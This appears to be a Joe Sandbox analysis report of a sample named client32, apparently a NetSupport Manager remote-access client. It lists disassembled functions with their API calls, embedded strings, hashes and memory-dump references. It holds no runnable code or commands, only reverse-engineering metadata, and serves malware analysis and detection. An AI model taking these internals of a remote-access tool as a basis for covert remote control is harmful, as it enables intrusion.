Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
String ID: ConfigList$PCICTL
API String ID: 4014706405-1939909508
Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50

Function 1103B8B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1103B8E8
_malloc.LIBCMT ref: 1103B97B
_memmove.LIBCMT ref: 1103B9E0
SendMessageTimeoutA.USER32(?,0000004A,0001033C,00000007,00000002,00002710,?), ref: 1103BA40
_free.LIBCMT ref: 1103BA47

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsA(), xrefs: 1103B96A, 1103B9A1, 1103B9CD, 1103BA0B
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 1103B965, 1103B99C, 1103B9C8, 1103BA06

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 3610575347-2270926670
Opcode ID: 5afe1aae09a1686d145e014b6988995a74e7e3fdef39e448a5fc1c21bda68c6a
Instruction ID: cf71befd834ca9d6d619551618e05b544aa7bc38abc68460657087db59e74738
Opcode Fuzzy Hash: 5afe1aae09a1686d145e014b6988995a74e7e3fdef39e448a5fc1c21bda68c6a
Instruction Fuzzy Hash: B0514F75E0061E9FDB00CB94CC81EEEF3B9BF98708F104169E526A7280E7316A06CB91

Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1101567A
_memset.LIBCMT ref: 110156BE
RegQueryValueExA.ADVAPI32 ref: 110156F8

Strings

NSLSP, xrefs: 11015708
%012d, xrefs: 11015674
PackedCatalogItem, xrefs: 110156E2
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
Opcode Fuzzy Hash: 29f9011e3ada9e7bd91b50f2f931db6d5ceb57e52f479653d1e62c62b495717e
Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90

Function 11027690 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122windowsleepCOMMON

Download Yara Rule

APIs

GetMessageA.USER32 ref: 110276B3
TranslateMessage.USER32(?), ref: 110276E1
DispatchMessageA.USER32(?), ref: 110276EB
Sleep.KERNEL32(000003E8), ref: 11027774
GetMessageA.USER32 ref: 110277DA

Strings

Bridge, xrefs: 11027697
BridgeThread::Attempting to open bridge..., xrefs: 1102772E, 11027776

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$DispatchSleepTranslate
String ID: Bridge$BridgeThread::Attempting to open bridge...
API String ID: 3237117195-3850961587
Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1

Function 110935A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

GetWindowLongA.USER32(?,000000EC), ref: 110935E9
SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetWindowLongA.USER32(?,000000F0), ref: 11093640
SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110935D1, 110935FE, 11093628, 11093655
m_hWnd, xrefs: 110935D6, 11093603, 1109362D, 1109365A
qu, xrefs: 11093617, 1109366E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$qu
API String ID: 3136964118-4145319076
Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98

Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(00000000,0000002C), ref: 110B9594
MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001), ref: 110B9606
SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B957A
j CB::OnRemoteSizeNormal(%d, %d, %d, %d), xrefs: 110B9620
m_hWnd, xrefs: 110B957F
Norm, xrefs: 110B9560

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
API String ID: 1092798621-1973987134
Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90

Function 1100F480 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
std::bad_exception::bad_exception.LIBCMT ref: 1100F554
__CxxThrowException@8.LIBCMT ref: 1100F562
std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F

Strings

bad cast, xrefs: 1100F54C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92

Function 11135700 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000130,000003E8), ref: 1113572F
GetTickCount.KERNEL32 ref: 1113578C

Part of subcall function 111449B0: GetTickCount.KERNEL32(B24479DC,00000000,11195AD8,?), ref: 11144A18

wsprintfA.USER32 ref: 111357BC

Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702

WaitForSingleObject.KERNEL32(00000130,000003E8), ref: 11135802

Strings

UI.CPP, xrefs: 111357E9
ResponseChk, xrefs: 11135717
Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$ExitProcesswsprintf
String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
API String ID: 2020353970-2880927372
Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91

Function 11017B00 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 11017B3C
_GetRawWMIStringW@16.PCICL32 ref: 11017B67
CoUninitialize.OLE32 ref: 11017C1C

Strings

USB, xrefs: 11017B96
Win32_PointingDevice, xrefs: 11017B58
HID, xrefs: 11017BB2
PS/2, xrefs: 11017BCE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InitializeStringUninitializeW@16
String ID: HID$PS/2$USB$Win32_PointingDevice
API String ID: 1826621714-1320232752
Opcode ID: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
Instruction ID: d5a300e082a68ff88eaf99d811029957e717e47c388a0f511f099868f117258d
Opcode Fuzzy Hash: 9d2e9c34f5b1b97c684259860103f4124c37c48c5ab43a403e993a8275961f5c
Instruction Fuzzy Hash: CE312F75A0061BDBDB24DF54CD84BEAB7B8FF48305F0044E5EA09AB244EB75EA84CB50

Function 110F1600 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
GetShortPathNameA.KERNEL32 ref: 110F166A

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708

Strings

nsmvxd.386, xrefs: 110F168B
pcdvxd.386, xrefs: 110F16CD
\\.\, xrefs: 110F163B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CreateName$ModulePathShort_strrchr
String ID: \\.\$nsmvxd.386$pcdvxd.386
API String ID: 1318148156-3179819359
Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94

Function 110817B0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 11081859

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\DataStream.cpp, xrefs: 110817CA, 110817E8, 1108180F, 1108182C, 1108186F, 11081896
m_nLength>=nBytes, xrefs: 11081874
IsA(), xrefs: 110817CF, 1108189B
nBytes>=0, xrefs: 110817ED
pData, xrefs: 11081814
!m_bReadOnly, xrefs: 11081831

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_memmovewsprintf
String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
API String ID: 1528188558-3417006389
Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2

Function 1103F720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
DestroyCursor.USER32(00000000), ref: 1103F7A1
SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
UpdateWindow.USER32 ref: 1103F7F2

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
m_hWnd, xrefs: 1103F7E1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
